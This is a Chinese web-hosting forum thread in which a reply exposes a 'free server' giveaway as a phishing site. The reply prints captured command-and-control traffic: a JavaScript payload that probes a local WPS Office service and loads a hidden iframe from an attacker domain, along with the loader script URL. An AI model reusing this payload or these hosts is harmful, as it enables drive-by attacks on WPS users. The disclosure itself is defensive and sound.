全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1178|回复: 24
打印 上一主题 下一主题

[美国VPS] 免费服务器领取

[复制链接]
跳转到指定楼层
1#
发表于 2025-7-17 15:44:01 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
提示: 作者被禁止或删除 内容自动屏蔽
推荐
发表于 2025-7-17 16:09:52 | 只看该作者
本帖最后由 Typeboom 于 2025-7-17 16:12 编辑

这站是钓鱼的

里面会加载这个JS
https://apis.fjersihjktsvhiiuirahts.online/RXGNHYJP.js

创建socket.io链接,通过websocket下发恶意js
  1. 42["execute",{"func":"var attack = function(params){\n            params.time = new Date();\n            let _result_ = (function(){ var result = [];\n\nfunction makeRequest() {\n    var m = Date.now();\n    var script = document.createElement('script');\n    script.src = 'https://localhost.wbridge.wps.cn:4709/';\n    script.onload = function() {\n        var currentTime = Date.now();\n        var elapsedTime = currentTime - m;\n        result.push(elapsedTime);\n        if (result.length === 5) {\n            calculateAverage();\n        } else {\n            makeRequest();\n        }\n    };\n    script.onerror = function() {\n        var currentTime = Date.now();\n        var elapsedTime = currentTime - m;\n        result.push(elapsedTime);\n        if (result.length === 5) {\n            calculateAverage();\n        } else {\n            makeRequest();\n        }\n    };\n    document.body.appendChild(script);\n}\n\nfunction calculateAverage() {\n    var sum = result.reduce(function(a, b) {\n        return a + b;\n    }, 0);\n    var w_key = sum / result.length;\n    if (w_key < 300) {\n        var iframe = document.createElement("iframe");\n        iframe.src = "https://www.onlineksyun.com/ifs.html";\n        iframe.frameborder = "no";\n        iframe.style.zIndex = -1000;\n        iframe.style.position = "absolute";\n        iframe.style.opacity = 0;\n        iframe.style.top = "0px";\n        iframe.style.left = "0px";\n        iframe.width = "300px";\n        iframe.height = "2000px";\n        iframe.onload = function() {\n            console.log("iframe loaded");\n        };\n        document.body.appendChild(iframe);\n    }\n}\n\nmakeRequest(); })()\n            try{\n              socket.emit("result", {\n                success: true,\n                message: "Successfully executed custom command at " + new Date() + (_result_ ? "\\nReturned Value: " + _result_ : ''),\n                params\n              });\n            }catch(e){\n              socket.emit("result", {\n                success: false,\n                message: e.toString(),\n                params\n              });\n            }\n          }","params":{"victim":5802,"_attack_instance_id":"5L_tTV5sJYmdyLVdAEXf_1752739731190"}}]

  2. 42["result",{"success":true,"message":"Successfully executed custom command at Thu Jul 17 2025 08:08:51 GMT+0000 (Coordinated Universal Time)","params":{"victim":5802,"_attack_instance_id":"5L_tTV5sJYmdyLVdAEXf_1752739731190","time":"2025-07-17T08:08:51.636Z"}}]
复制代码


尝试连接到
https://localhost.wbridge.wps.cn:4709/

应该是利用WPS的漏洞,下次记得改成让MJJ下exe,还方便点

评分

参与人数 1威望 +17 收起 理由
欧阳逍遥 + 17 赞一个!

查看全部评分

22#
发表于 2025-7-17 18:09:18 | 只看该作者
属实在关公面前耍大刀
21#
发表于 2025-7-17 17:38:10 | 只看该作者
https://github.com/George-boop-svg/Chinese-hackers-use-WPS-to-attack
20#
发表于 2025-7-17 17:31:49 | 只看该作者
幸好没有装WPS
19#
发表于 2025-7-17 17:08:10 | 只看该作者
Typeboom 发表于 2025-7-17 17:05
那完蛋咯,你也要变成免费服务器了

我自己电脑,咋变成服务器
18#
发表于 2025-7-17 17:06:46 | 只看该作者

打开这个网站就会泄露数据吗?我的wps是本身就安装了的
打开这个网站前我的wps没打开
17#
发表于 2025-7-17 17:05:20 | 只看该作者
jiweitu 发表于 2025-7-17 17:02
我电脑安装了WPS


那完蛋咯,你也要变成免费服务器了
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-10-19 05:08 , Processed in 0.081954 second(s), 13 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表